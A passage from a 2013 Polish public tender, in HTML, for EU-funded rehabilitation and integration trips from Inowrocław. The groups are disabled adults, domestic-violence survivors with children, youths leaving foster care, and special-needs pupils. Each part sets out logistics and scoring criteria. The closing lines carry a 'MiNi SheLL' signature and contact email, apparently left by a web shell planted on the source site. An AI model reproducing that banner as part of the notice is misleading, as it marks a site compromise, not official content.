Zamawiający zastrzega sobie prawo do zmniejszenia liczby uczestników o max. 2 osoby.
2. Termin wyjazdu: czerwiec/lipiec/sierpień 2013 r.
3. Ilość dni: 10.
4. Miejsce pobytu: 
Ośrodek rehabilitacyjny, przystosowany dla osób niepełnosprawnych - w tym poruszających się na wózkach inwalidzkich. W przypadku ośrodka, w miejscowości nadmorskiej - ośrodek rehabilitacyjny zlokalizowany blisko morza w miejscu, 
w którym istnieje możliwość zejścia na plażę dla osób poruszających się na wózkach inwalidzkich.
5. Pozostałe wymagania względem Wykonawcy:
a) zapewnienie wyspecjalizowanej kadry do realizacji przedmiotu zamówienia,
b) przeprowadzenie 2 badań lekarskich (pierwsze zakończone zaordynowaniem zabiegów leczniczych),
c) zapewnienie każdej osobie niepełnosprawnej po 3 zabiegi rehabilitacyjne dziennie wg wskazań lekarza,
d) zapewnienie opieki opiekuna - osoby odpowiedzialnej za organizację i realizację zajęć rehabilitacyjnych,
e) zapewnienie transportu klimatyzowanym pojazdem z Inowrocławia do miejsca pobytu i z powrotem, dla 18 osób,
f) zapewnienie ubezpieczenia dla całej 18-osobowej grupy na czas przejazdów 
i pobytu; niezwłocznie po podpisaniu umowy na realizacje przedmiotowego zadania Wykonawca przedstawi Zamawiającemu polisę potwierdzającą obowiązkowe ubezpieczenie uczestników wyjazdu od następstw nieszczęśliwych wypadków powstałych w trakcie pobytu oraz w trakcie wszelkich przejazdów z nim związanych,
g) zapewnienie noclegów dla uczestników w pokojach 2, 3 i 4 osobowych z pełnym węzłem sanitarnym, wyposażonych w TV; wymagane jest aby wszystkie ww. pokoje zlokalizowane były w jednym budynku,
h) oznakowanie pomieszczeń i sal, wyznaczonych do realizacji przedmiotu zamówienia - poprzez zastosowanie odpowiednich logotypów oraz informacji o współfinansowaniu turnusu ze środków Europejskiego Funduszu Społecznego,
i) zapewnienie pełnego wyżywienia - 3 posiłki dziennie - dla uczestników,
j) zapewnienie suchego prowiantu podczas ewentualnych wyjazdów organizowanych 
w trakcie pobytu,
k) zapewnienie opieki medycznej na czas pobytu oraz wszelkich przejazdów z nim związanych,
l) zapewnienie środka transportu niezbędnego do ewentualnych przejazdów objętych programem zespołu ćwiczeń; w cenę oferty muszą zostać wkalkulowane wszystkie koszty z tym związane,
m) wkalkulowanie w cenę oferty wszelkich kosztów związanych z realizacją programu zespołu ćwiczeń (np. koszty wstępu do obiektów przewidzianych w programie, koszty przejazdów w trakcie pobytu, opłaty klimatyczne),
n) przekazanie każdemu uczestnikowi zespołu ćwiczeń imiennego zaświadczenia o jego odbyciu,
o) dostarczenie Zamawiającemu:
- kart rehabilitacyjnych potwierdzających wykorzystanie przez uczestników zabiegów rehabilitacyjnych,
- płyty CD z dokumentacją fotograficzną z pobytu uczestników w ośrodku i odbywania zajęć rehabilitacyjnych,
- innych dokumentów, o których wypełnienie zwróci się do Wykonawcy Zamawiający..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.25.00-4, 55.24.00.00-4, 55.27.00.00-3, 63.50.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 10.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Potencjał bazy - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wyjazd integracyjny dla osób dorosłych z dziećmi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Charakterystyka grupy:
10 osób dorosłych doświadczających przemocy w rodzinie + 3 dzieci w wieku od 10 do 13 lat, w tym jedno dziecko niepełnosprawne poruszające się samodzielnie + 1 psycholog.
Zamawiający zastrzega sobie prawo do zmniejszenia lub zwiększenia liczby uczestników o max. 2 osoby.
2. Termin wyjazdu: lipiec/sierpień 2013 r.
3. Ilość dni: 7.
4. Miejsce pobytu: 
ośrodek wypoczynkowy nad Bałtykiem, zlokalizowany blisko morza.
5. Pozostałe wymagania względem Wykonawcy: 
a) zapewnienie wyspecjalizowanej kadry do realizacji przedmiotu zamówienia,
b) zapewnienie opieki nad dziećmi podczas zajęć osób dorosłych z zapewnionym przez Zamawiającego psychologiem - 5 godz. dziennie przez 5 dni,
c) organizacja i prowadzenie zajęć integracyjnych dla uczestników wyjazdu,
d) zapewnienie transportu klimatyzowanym pojazdem z Inowrocławia do miejsca pobytu i z powrotem, dla 14 osób,
e) zapewnienie ubezpieczenia dla całej 14-osobowej grupy na czas przejazdów 
i pobytu; niezwłocznie po podpisaniu umowy na realizacje przedmiotowego zadania Wykonawca przedstawi Zamawiającemu polisę potwierdzającą obowiązkowe ubezpieczenie uczestników wyjazdu od następstw nieszczęśliwych wypadków powstałych w trakcie pobytu oraz w trakcie wszelkich przejazdów z nim związanych,
f) zapewnienie noclegów dla uczestników i ich dzieci w pokojach 2 i 3 osobowych z pełnym węzłem sanitarnym i TV oraz dla psychologa w pokoju 1 osobowym z pełnym węzłem sanitarnym i TV; wymagane jest aby wszystkie ww. pokoje zlokalizowane były w jednym budynku,
g) zapewnienie sali konferencyjnej, zlokalizowanej na terenie ośrodka, w którym zakwaterowana będzie grupa uczestników, dostępnej przez 5 dni po 5 godzin dziennie (w celu prowadzenia zajęć z psychologiem),
h) umożliwienie oznakowania pomieszczeń i sal, wyznaczonych do realizacji przedmiotu zamówienia - poprzez zastosowanie odpowiednich logotypów oraz informacji o współfinansowaniu turnusu ze środków Europejskiego Funduszu Społecznego,
i) zapewnienie pełnego wyżywienia - 3 posiłki dziennie, śniadania i kolacje w formie stołu szwedzkiego - dla uczestników ich dzieci oraz psychologa,
j) zapewnienie cateringu podczas zajęć z psychologiem (zimne i gorące napoje, ciastka, przekąski),
k) zapewnienie suchego prowiantu podczas ewentualnych wyjazdów organizowanych 
w ramach pobytu,
l) zapewnienie opieki medycznej na czas pobytu oraz wszelkich przejazdów z nim związanych,
m) zapewnienie środka transportu niezbędnego do ewentualnych przejazdów objętych programem pobytu; w cenę oferty muszą zostać wkalkulowane wszystkie koszty z tym związane,
n) wkalkulowanie w cenę oferty wszelkich kosztów związanych z realizacją programu pobytu (np. koszty wstępu do obiektów przewidzianych w programie, koszty przejazdów w trakcie pobytu, opłaty klimatyczne),
o) dostarczenie Zamawiającemu:
- płyty CD z dokumentacją fotograficzną z pobytu uczestników w ośrodku 
i odbywania zajęć integracyjnych,
- innych dokumentów, o których wypełnienie zwróci się do Wykonawcy Zamawiający..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.24.00.00-4, 55.27.00.00-3, 63.50.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Atrakcyjność zajęć integracyjnych - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Wyjazd integracyjny dla osób w wieku 18-25 lat.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Charakterystyka grupy:
10 osób opuszczających całodobowe placówki opiekuńczo-wychowawcze i rodziny zastępcze + doradca zawodowy.
Zamawiający zastrzega sobie prawo do zmniejszenia liczby uczestników o max. 2 osoby.
2. Termin wyjazdu: I połowa lipca 2013 r.;
3. Ilość dni: 7.
4. Miejsce pobytu: 
ośrodek wypoczynkowy nad Bałtykiem, zlokalizowany blisko morza.
5. Pozostałe wymagania względem Wykonawcy:
a) zapewnienie wyspecjalizowanej kadry do realizacji przedmiotu zamówienia, w tym opiekuna grupy,
b) organizacja i prowadzenie zajęć integracyjnych dla uczestników wyjazdu,
c) zapewnienie transportu klimatyzowanym pojazdem z Inowrocławia do miejsca pobytu i z powrotem, dla uczestników wyjazdu i doradcy zawodowego,
d) zapewnienie ubezpieczenia dla całej 10-osobowej grupy i doradcy zawodowego na czas przejazdów i pobytu; niezwłocznie po podpisaniu umowy na realizacje przedmiotowego zadania Wykonawca przedstawi Zamawiającemu polisę potwierdzającą obowiązkowe ubezpieczenie uczestników wyjazdu od następstw nieszczęśliwych wypadków powstałych w trakcie pobytu oraz w trakcie wszelkich przejazdów z nim związanych,
e) zapewnienie noclegów dla uczestników w pokojach 2 i 3 osobowych z pełnym węzłem sanitarnym i TV oraz dla doradcy zawodowego w pokoju 1 osobowym z pełnym węzłem sanitarnym i TV; wymagane jest aby wszystkie ww. pokoje zlokalizowane były w jednym budynku,
f) zapewnienie sali konferencyjnej, zlokalizowanej na terenie ośrodka, w którym zakwaterowana będzie grupa uczestników, dostępnej przez 5 dni po 5 godzin dziennie (w celu prowadzenia zajęć z doradcą zawodowym),
g) umożliwienie oznakowania pomieszczeń i sal, wyznaczonych do realizacji przedmiotu zamówienia - poprzez zastosowanie odpowiednich logotypów oraz informacji o współfinansowaniu pobytu ze środków Europejskiego Funduszu Społecznego,
h) zapewnienie pełnego wyżywienia - 3 posiłki dziennie, śniadania i kolacje w formie stołu szwedzkiego - dla uczestników i doradcy zawodowego,
i) zapewnienie cateringu podczas zajęć z doradcą zawodowym (napoje zimne i gorące, ciastka, przekąski),
j) zapewnienie suchego prowiantu podczas ewentualnych wyjazdów organizowanych 
w ramach pobytu oraz w trakcie wyjazdu do miejsca pobytu i powrotu do Inowrocławia,
k) zapewnienie opieki medycznej na czas pobytu oraz wszelkich przejazdów z nim związanych,
l) zapewnienie środka transportu niezbędnego do ewentualnych przejazdów objętych programem pobytu; w cenę oferty muszą zostać wkalkulowane wszystkie koszty 
z tym związane,
m) wkalkulowanie w cenę oferty wszelkich kosztów związanych z realizacją programu pobytu (np. koszty wstępu do obiektów przewidzianych w programie, koszty przejazdów w trakcie pobytu, opłaty klimatyczne),
n) dostarczenie Zamawiającemu:
- płyty CD z dokumentacją fotograficzną z pobytu uczestników w ośrodku 
i odbywania zajęć integracyjnych,
- innych dokumentów, o których wypełnienie zwróci się do Wykonawcy Zamawiający..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.24.00.00-4, 55.27.00.00-3, 63.50.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Atrakcyjność zajęć integracyjnych - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Wyjazd integracyjny dla 15 osób w wieku 15-25 lat.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Charakterystyka grupy:
15 osób przebywających w  całodobowych placówkach opiekuńczo-wychowawczych  i rodzinach zastępczych + doradca zawodowy.
Zamawiający zastrzega sobie prawo do zmniejszenia lub zwiększenia liczby uczestników o max. 2 osoby.
2. Termin wyjazdu: I połowa lipca 2013 r.;
3. Ilość dni: 7.
4. Miejsce pobytu: 
ośrodek wypoczynkowy nad Bałtykiem, zlokalizowany blisko morza;
5. Pozostałe wymagania względem Wykonawcy:
a) zapewnienie wyspecjalizowanej kadry do realizacji przedmiotu zamówienia, w tym   2 opiekunów grupy,
b) organizacja i prowadzenie zajęć integracyjnych dla uczestników wyjazdu,
c) zapewnienie transportu klimatyzowanym pojazdem z Inowrocławia do miejsca pobytu i z powrotem, dla uczestników wyjazdu i doradcy zawodowego,
d) zapewnienie ubezpieczenia dla całej 15-osobowej grupy i doradcy zawodowego na czas przejazdów i pobytu; niezwłocznie po podpisaniu umowy na realizacje przedmiotowego zadania Wykonawca przedstawi Zamawiającemu polisę potwierdzającą obowiązkowe ubezpieczenie uczestników wyjazdu od następstw nieszczęśliwych wypadków powstałych w trakcie pobytu oraz w trakcie wszelkich przejazdów z nim związanych,
e) zapewnienie noclegów dla uczestników w pokojach 2 i 3 osobowych z pełnym węzłem sanitarnym i TV oraz dla doradcy zawodowego w pokoju 1 osobowym z pełnym węzłem sanitarnym i TV; wymagane jest aby wszystkie ww. pokoje zlokalizowane były w jednym budynku,
f) zapewnienie sali konferencyjnej, zlokalizowanej na terenie ośrodka, w którym zakwaterowana będzie grupa uczestników, dostępnej przez 5 dni po 5 godzin dziennie (w celu prowadzenia zajęć z doradcą zawodowym),
g) umożliwienie oznakowania pomieszczeń i sal, wyznaczonych do realizacji przedmiotu zamówienia - poprzez zastosowanie odpowiednich logotypów oraz informacji o współfinansowaniu pobytu ze środków Europejskiego Funduszu Społecznego,
h) zapewnienie pełnego wyżywienia - 3 posiłki dziennie, śniadania i kolacje w formie stołu szwedzkiego - dla uczestników i doradcy zawodowego,
i) zapewnienie cateringu podczas zajęć z doradcą zawodowym (napoje zimne i gorące, ciastka, przekąski),
j) zapewnienie suchego prowiantu podczas ewentualnych wyjazdów organizowanych 
w ramach pobytu oraz w trakcie wyjazdu do miejsca pobytu i powrotu do Inowrocławia,
k) zapewnienie opieki medycznej na czas pobytu oraz wszelkich przejazdów z nim związanych,
l) zapewnienie środka transportu niezbędnego do ewentualnych przejazdów objętych programem pobytu; w cenę oferty muszą zostać wkalkulowane wszystkie koszty 
z tym związane,
m) wkalkulowanie w cenę oferty wszelkich kosztów związanych z realizacją programu pobytu (np. koszty wstępu do obiektów przewidzianych w programie, koszty przejazdów w trakcie pobytu, opłaty klimatyczne),
n) dostarczenie Zamawiającemu:
- płyty CD z dokumentacją fotograficzną z pobytu uczestników w ośrodku 
i odbywania zajęć integracyjnych,
- innych dokumentów, o których wypełnienie zwróci się do Wykonawcy Zamawiający..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.24.00.00-4, 55.27.00.00-3, 63.50.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Atrakcyjność zajęć integracyjnych - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Wyjazd integracyjny dla młodzieży.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Charakterystyka grupy:
13 osób - młodzież w wieku 15-17 lat - uczniowie Zespołu Szkół Integracyjnych posiadających orzeczenie o potrzebie kształcenia specjalnego (wśród uczestników niektóre osoby posiadają orzeczenie o niepełnosprawności) + 1 psycholog.
Zamawiający zastrzega sobie prawo do zmniejszenia liczby uczestników o max. 2 osoby.
2. Termin wyjazdu: I połowa lipca 2013 r.
3. Ilość dni: 7.
4. Miejsce pobytu: 
ośrodek wypoczynkowy nad Bałtykiem, zlokalizowany blisko morza.
5. Pozostałe wymagania względem Wykonawcy:
a) zapewnienie wyspecjalizowanej kadry do realizacji przedmiotu zamówienia,
b) zapewnienie 2 opiekunów - na czas pobytu oraz przejazdu uczestników 
z Inowrocławia do miejsca pobytu i z powrotem; wymagana jest opieka wyznaczonych przez Wykonawcę opiekunów już od momentu wyjazdu uczestników z Inowrocławia,
c) zapewnienie opieki medycznej w miejscu pobytu, niezbędnej w przypadku zaistnienia nieprzewidzianych wydarzeń, bądź pogorszenia stanu zdrowia uczestników,
d) organizacja i prowadzenie zajęć integracyjnych dla uczestników wyjazdu,
e) zapewnienie transportu klimatyzowanym pojazdem z Inowrocławia do miejsca pobytu i z powrotem, dla 16 osób (13 uczestników + 1 psycholog + 2 opiekunów grupy),
f) zapewnienie ubezpieczenia dla całej 14-osobowej grupy (13 uczestników + 1 psycholog) na czas przejazdów i pobytu; niezwłocznie po podpisaniu umowy na realizacje przedmiotowego zadania Wykonawca przedstawi Zamawiającemu polisę potwierdzającą obowiązkowe ubezpieczenie uczestników wyjazdu od następstw nieszczęśliwych wypadków powstałych w trakcie pobytu oraz w trakcie wszelkich przejazdów z nim związanych,
g) zapewnienie noclegów dla uczestników w pokojach 2 i 3 osobowych z pełnym węzłem sanitarnym oraz dla psychologa w pokoju 1 osobowym z pełnym węzłem sanitarnym i TV; wymagane jest aby wszystkie ww. pokoje zlokalizowane były w jednym budynku,
h) zapewnienie sali konferencyjnej, zlokalizowanej na terenie ośrodka, w którym zakwaterowana będzie grupa uczestników, dostępnej przez 5 dni po 5 godzin dziennie (w celu prowadzenia zajęć z psychologiem),
i) zapewnienie cateringu podczas zajęć z psychologiem (zimne i gorące napoje, ciastka, przekąski),
j) umożliwienie oznakowania pomieszczeń i sal, wyznaczonych do realizacji przedmiotu zamówienia - poprzez zastosowanie odpowiednich logotypów oraz informacji o współfinansowaniu turnusu ze środków Europejskiego Funduszu Społecznego,
k) zapewnienie pełnego wyżywienia - 3 posiłki dziennie, śniadania i kolacje w formie stołu szwedzkiego - dla uczestników i psychologa,
l) zapewnienie suchego prowiantu podczas ewentualnych wyjazdów organizowanych 
w ramach pobytu,
m) zapewnienie środka transportu niezbędnego do ewentualnych przejazdów objętych programem pobytu; w cenę oferty muszą zostać wkalkulowane wszystkie koszty z tym związane,
n) wkalkulowanie w cenę oferty wszelkich kosztów związanych z realizacją programu pobytu (np. koszty wstępu do obiektów przewidzianych w programie, koszty przejazdów w trakcie pobytu, opłaty klimatyczne),
o) dostarczenie Zamawiającemu:
- płyty CD z dokumentacją fotograficzną z pobytu uczestników w ośrodku 
i odbywania zajęć integracyjnych,
- innych dokumentów, o których wypełnienie zwróci się do Wykonawcy Zamawiający..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.24.00.00-4, 55.27.00.00-3, 63.50.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Atrakcyjność zajęć integracyjnych - 30</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com